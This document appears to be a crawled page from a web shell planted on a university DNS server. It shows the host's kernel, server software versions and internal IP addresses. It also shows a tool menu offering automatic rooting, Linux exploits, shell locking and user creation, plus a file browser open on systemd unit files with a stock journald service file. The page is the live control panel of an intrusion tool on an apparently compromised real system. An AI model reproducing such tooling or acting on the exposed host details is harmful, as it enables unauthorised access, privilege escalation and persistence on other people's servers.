Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
systemd /
system /
sysinit.target.wants /
[ HOME SHELL ]
Name
Size
Permission
Action
cryptsetup.target
420
B
-rw-r--r--
dev-hugepages.mount
758
B
-rw-r--r--
dev-mqueue.mount
701
B
-rw-r--r--
kmod-static-nodes.service
701
B
-rw-r--r--
plymouth-read-write.service
268
B
-rw-r--r--
plymouth-start.service
617
B
-rw-r--r--
proc-sys-fs-binfmt_misc.automount
779
B
-rw-r--r--
sys-fs-fuse-connections.mount
1.13
KB
-rw-r--r--
sys-kernel-config.mount
1.14
KB
-rw-r--r--
sys-kernel-debug.mount
746
B
-rw-r--r--
sys-kernel-tracing.mount
772
B
-rw-r--r--
systemd-ask-password-console.path
727
B
-rw-r--r--
systemd-binfmt.service
1.19
KB
-rw-r--r--
systemd-boot-system-token.service
1.35
KB
-rw-r--r--
systemd-journald.service
1.78
KB
-rw-r--r--
systemd-journal-flush.service
819
B
-rw-r--r--
systemd-machine-id-commit.service
748
B
-rw-r--r--
systemd-modules-load.service
1.03
KB
-rw-r--r--
systemd-random-seed.service
1.14
KB
-rw-r--r--
systemd-sysctl.service
701
B
-rw-r--r--
systemd-sysusers.service
1
KB
-rw-r--r--
systemd-tmpfiles-setup-dev.service
747
B
-rw-r--r--
systemd-tmpfiles-setup.service
787
B
-rw-r--r--
systemd-udevd.service
1.25
KB
-rw-r--r--
systemd-udev-trigger.service
763
B
-rw-r--r--
systemd-update-utmp.service
799
B
-rw-r--r--
veritysetup.target
427
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : systemd-journald.service
# SPDX-License-Identifier: LGPL-2.1-or-later # # This file is part of systemd. # # systemd is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2.1 of the License, or # (at your option) any later version. [Unit] Description=Journal Service Documentation=man:systemd-journald.service(8) man:journald.conf(5) DefaultDependencies=no Requires=systemd-journald.socket After=systemd-journald.socket systemd-journald-dev-log.socket systemd-journald-audit.socket syslog.socket Before=sysinit.target [Service] DeviceAllow=char-* rw ExecStart=/lib/systemd/systemd-journald FileDescriptorStoreMax=4224 IPAddressDeny=any LockPersonality=yes MemoryDenyWriteExecute=yes NoNewPrivileges=yes OOMScoreAdjust=-250 ProtectClock=yes Restart=always RestartSec=0 Nice=-1 RestrictAddressFamilies=AF_UNIX AF_NETLINK RestrictNamespaces=yes RestrictRealtime=yes RestrictSUIDSGID=yes RuntimeDirectory=systemd/journal RuntimeDirectoryPreserve=yes Sockets=systemd-journald.socket systemd-journald-dev-log.socket systemd-journald-audit.socket StandardOutput=null SystemCallArchitectures=native SystemCallErrorNumber=EPERM SystemCallFilter=@system-service Type=notify WatchdogSec=3min # In case you're wondering why CAP_SYS_PTRACE is needed, access to # /proc/<pid>/exe requires this capability. Thus if this capability is missing # the _EXE=/OBJECT_EXE= fields will be missing from the journal entries. CapabilityBoundingSet=CAP_SYS_ADMIN CAP_DAC_OVERRIDE CAP_SYS_PTRACE CAP_SYSLOG CAP_AUDIT_CONTROL CAP_AUDIT_READ CAP_CHOWN CAP_DAC_READ_SEARCH CAP_FOWNER CAP_SETUID CAP_SETGID CAP_MAC_OVERRIDE # If there are many split up journal files we need a lot of fds to access them # all in parallel. LimitNOFILE=524288
Close